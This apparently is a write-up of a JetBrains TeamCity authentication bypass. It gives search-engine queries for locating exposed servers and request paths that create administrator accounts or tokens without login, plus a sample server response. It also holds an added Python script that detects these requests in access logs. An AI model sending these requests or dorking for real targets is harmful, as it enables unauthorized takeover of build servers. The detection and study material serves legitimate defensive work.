[Authentication Bypass] JetBrains TeamCity

Vulnerability principle

Send a request for a non-existent page to the vulnerable server

?jsp=/app/rest/server;.jsp

This causes the server to report an error and provide version information, without requiring login

Fofa

app="JET_BRAINS-TeamCity"

ZoomEye

app:"JetBrains TeamCity"

Shodan

http.component:"teamcity"

Creating an administrator account

This is done by sending a request containing the desired username and password to the server's user management API

<teamcitysite>/hax?jsp=/app/rest/users;.jsp

Or generate an administrator token for yourself to consolidate access

<teamcitysite>/hax?jsp=/app/rest/users/id:1/tokens/TokenName;.jsp

GET request

GET <teamcitysite>/hax?jsp=/app/rest/server;.jsp HTTP/1.1

Server response

C:\Users\>curl -ik http://x.x.x.x:8111/hax?jsp=/app/rest/server;.jsp

HTTP/1.1 200

TeamCity-Node-Id: MAIN_SERVER

Cache-Control: no-store

Content-Type: application/xml;charset=ISO-8859-1

Content-Language: en-IE

Content-Length: 794

Date: Wed, 14 Feb 2024 17:24:59 GMT

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><server version="2023.11.3 (build 147512)" versionMajor="2023" versionMinor="11" startTime="20240212T021131-0800" currentTime="20240214T092459-0800" buildNumber="147512" buildDate="20240129T000000-0800" internalId="cfb27466-d6d6-4bc8-a398-8b777182d653" role="main_node" webUrl="http://localhost:8111" artifactsUrl=""><projects href="/app/rest/projects"/><vcsRoots href="/app/rest/vcs-roots"/><builds href="/app/rest/builds"/><users href="/app/rest/users"/><userGroups href="/app/rest/userGroups"/><agents href="/app/rest/agents"/><buildQueue href="/app/rest/buildQueue"/><agentPools href="/app/rest/agentPools"/><investigations href="/app/rest/investigations"/><mutes href="/app/rest/mutes"/><nodes href="/app/rest/server/nodes"/></server>
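
Detection side of the request shape shown above, as an added example that is not part of the original post: it scans access-log lines for a `jsp=` parameter that carries an `/app/rest/` path ending in `;.jsp`. The combined-style log format, the function names and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Assumed log format: Apache/Tomcat "combined"-style access log lines.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def rest_path_in_jsp_param(target):
    """Return the REST path carried in a jsp= parameter, or None.

    Matches the shape shown on the page: jsp=/app/rest/<resource>;.jsp
    The query is split on '&' only, so the ';' stays inside the value.
    """
    for pair in urlsplit(target).query.split("&"):
        name, _, raw = pair.partition("=")
        if unquote(name) != "jsp":
            continue
        # unquote() also covers percent-encoded forms such as %2F and %3B.
        path, semicolon, suffix = unquote(raw).partition(";")
        if path.startswith("/app/rest/") and semicolon and suffix.lower().endswith(".jsp"):
            return path
    return None

def scan(lines):
    """Return one finding per log line that carries the pattern."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        path = rest_path_in_jsp_param(m["target"])
        if path is None:
            continue
        # Per the page: /app/rest/users covers account and token creation,
        # other resources such as /app/rest/server disclose server details.
        severity = "high" if path.startswith("/app/rest/users") else "info"
        findings.append({"ip": m["ip"], "rest_path": path,
                         "status": int(m["status"]), "severity": severity})
    return findings

# Constructed sample log (addresses, methods, timestamps and sizes are made up).
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Feb/2024:17:24:59 +0000] "GET /hax?jsp=/app/rest/server;.jsp HTTP/1.1" 200 794',
    '192.0.2.10 - - [14/Feb/2024:17:25:30 +0000] "GET /hax?jsp=/app/rest/users;.jsp HTTP/1.1" 200 512',
    '192.0.2.10 - - [14/Feb/2024:17:26:02 +0000] "GET /hax?jsp=%2Fapp%2Frest%2Fusers%2Fid:1%2Ftokens%2FTokenName%3B.jsp HTTP/1.1" 200 230',
    '198.51.100.7 - admin [14/Feb/2024:17:27:00 +0000] "GET /app/rest/server HTTP/1.1" 200 794',
    '198.51.100.7 - - [14/Feb/2024:17:27:05 +0000] "GET /login.html?jsp=index.jsp HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A 2xx status on a flagged line from a client with no authenticated user in the log is the case to triage first; findings under /app/rest/users also warrant a review of the server's user and token lists.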

Vulnerability reproduction

Add an account using the PoC

PoC exploitation
